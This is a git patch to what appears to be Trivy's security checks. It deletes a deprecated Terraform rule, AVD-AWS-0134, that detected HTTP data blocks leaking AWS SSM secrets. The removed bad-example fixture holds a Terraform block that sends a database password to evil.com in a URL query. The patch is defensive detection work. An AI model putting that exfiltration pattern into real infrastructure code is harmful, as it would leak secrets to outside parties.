From e60cde373311b0588a52504fe26b2a55a2273f13 Mon Sep 17 00:00:00 2001
From: Nikita Pivkin
Date: Tue, 12 Nov 2024 17:07:52 +0600
Subject: [PATCH] chore: remove AVD-AWS-0134

Signed-off-by: Nikita Pivkin
---
 .../aws/sns/topic_encryption_with_cmk.go | 4 +-
 checks/cloud/aws/ssm/avoid_leaks_via_http.go | 52 -------------------
 .../cloud/aws/ssm/avoid_leaks_via_http.tf.go | 30 ----------
 3 files changed, 1 insertion(+), 85 deletions(-)
 delete mode 100644 checks/cloud/aws/ssm/avoid_leaks_via_http.go
 delete mode 100644 checks/cloud/aws/ssm/avoid_leaks_via_http.tf.go

diff --git a/checks/cloud/aws/sns/topic_encryption_with_cmk.go b/checks/cloud/aws/sns/topic_encryption_with_cmk.go
index 8b9c27e7..85e020fc 100755
--- a/checks/cloud/aws/sns/topic_encryption_with_cmk.go
+++ b/checks/cloud/aws/sns/topic_encryption_with_cmk.go
@@ -34,9 +34,7 @@ var CheckTopicEncryptionUsesCMK = rules.Register(
 Links: cloudFormationTopicEncryptionUsesCMKLinks,
 RemediationMarkdown: cloudFormationTopicEncryptionUsesCMKRemediationMarkdown,
 },
- CustomChecks: scan.CustomChecks{},
- RegoPackage: "",
- Deprecated: true,
+ Deprecated: true,
 },
 func(s *state.State) (results scan.Results) {
 for _, topic := range s.AWS.SNS.Topics {
diff --git a/checks/cloud/aws/ssm/avoid_leaks_via_http.go b/checks/cloud/aws/ssm/avoid_leaks_via_http.go
deleted file mode 100644
index 02b98b90..00000000
--- a/checks/cloud/aws/ssm/avoid_leaks_via_http.go
+++ /dev/null
@@ -1,52 +0,0 @@
-package ssm
-
-import (
- "github.com/aquasecurity/trivy-checks/pkg/rules"
- "github.com/aquasecurity/trivy/pkg/iac/providers"
- "github.com/aquasecurity/trivy/pkg/iac/scan"
- "github.com/aquasecurity/trivy/pkg/iac/severity"
- "github.com/aquasecurity/trivy/pkg/iac/terraform"
-)
-
-var AvoidLeaksViaHTTP = rules.Register(
- scan.Rule{
- AVDID: "AVD-AWS-0134",
- Provider: providers.AWSProvider,
- Service: "ssm",
- ShortCode: "avoid-leaks-via-http",
- Summary: "Secrets should not be exfiltrated using Terraform HTTP data blocks",
- Impact: "Secrets could be exposed outside of the organisation.",
- Resolution: "Remove this potential exfiltration HTTP request.",
- Explanation: `The data.http block can be used to send secret data outside of the organisation.`,
- Links: []string{
- "https://sprocketfox.io/xssfox/2022/02/09/terraformsupply/",
- },
- Terraform: &scan.EngineMetadata{
- GoodExamples: terraformAvoidLeaksViaHTTPGoodExamples,
- BadExamples: terraformAvoidLeaksViaHTTPBadExamples,
- Links: terraformAvoidLeaksViaHTTPLinks,
- RemediationMarkdown: terraformAvoidLeaksViaHTTPRemediationMarkdown,
- },
- CustomChecks: scan.CustomChecks{
- Terraform: &scan.TerraformCustomCheck{
- RequiredTypes: []string{"data"},
- RequiredLabels: []string{"http"},
- Check: func(block *terraform.Block, module *terraform.Module) (results scan.Results) {
- attr := block.GetAttribute("url")
- if attr.IsNil() {
- return
- }
- for _, ref := range attr.AllReferences() {
- if ref.BlockType().Name() == "resource" && ref.TypeLabel() == "aws_ssm_parameter" {
- results.Add("Potential exfiltration of secret value detected", block)
- }
- }
- return
- },
- },
- },
- Severity: severity.Critical,
- Deprecated: true,
- },
- nil,
-)
diff --git a/checks/cloud/aws/ssm/avoid_leaks_via_http.tf.go b/checks/cloud/aws/ssm/avoid_leaks_via_http.tf.go
deleted file mode 100644
index 87688354..00000000
--- a/checks/cloud/aws/ssm/avoid_leaks_via_http.tf.go
+++ /dev/null
@@ -1,30 +0,0 @@
-package ssm
-
-var terraformAvoidLeaksViaHTTPGoodExamples = []string{
- `
-resource "aws_ssm_parameter" "db_password" {
- name = "db_password"
- type = "SecureString"
- value = var.db_password
-}
-
- `,
-}
-
-var terraformAvoidLeaksViaHTTPBadExamples = []string{
- `
-resource "aws_ssm_parameter" "db_password" {
- name = "db_password"
- type = "SecureString"
- value = var.db_password
-}
-
-data "http" "not_exfiltrating_data_honest" {
- url = "https://evil.com/?p=${aws_ssm_parameter.db_password.value}"
-}
- `,
-}
-
-var terraformAvoidLeaksViaHTTPLinks []string
-
-var terraformAvoidLeaksViaHTTPRemediationMarkdown = ``